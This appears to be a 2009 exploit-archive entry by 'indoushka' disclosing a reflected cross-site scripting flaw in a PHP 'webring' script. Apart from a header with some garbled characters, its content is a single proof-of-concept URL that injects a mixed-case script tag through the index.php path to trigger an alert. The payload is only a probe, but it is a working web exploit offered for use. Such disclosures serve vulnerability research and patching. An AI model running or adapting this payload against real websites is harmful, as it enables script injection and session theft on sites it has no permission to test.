id: 10444
date: 12/26/2009
title: webring Cross Site Scripting Vulnerability
author: indoushka
cves: 

==========================================
webring Cross Site Scripting Vulnerability
==========================================

========================================================================================
| # Title    : webring Cross Site Scripting Vulnerability                              |
| # Author   : indoushka                                                               |
| # CVE-ID   : ()                                                                      |
| # OSVDB-ID : ()                                                                      |
| # Script   : webring (http://www.kellishaver.com/)                                   |
| # Tested on: windows SP2 Fran&#65533;ais V.(Pnx2 2.0) + Lunix Fran&#65533;ais v.(9.4 Ubuntu)       |
| # Bug      : XSS                                                                     |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1- http://127.0.0.1/webring/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>



#  0day.today [2023-03-26]  #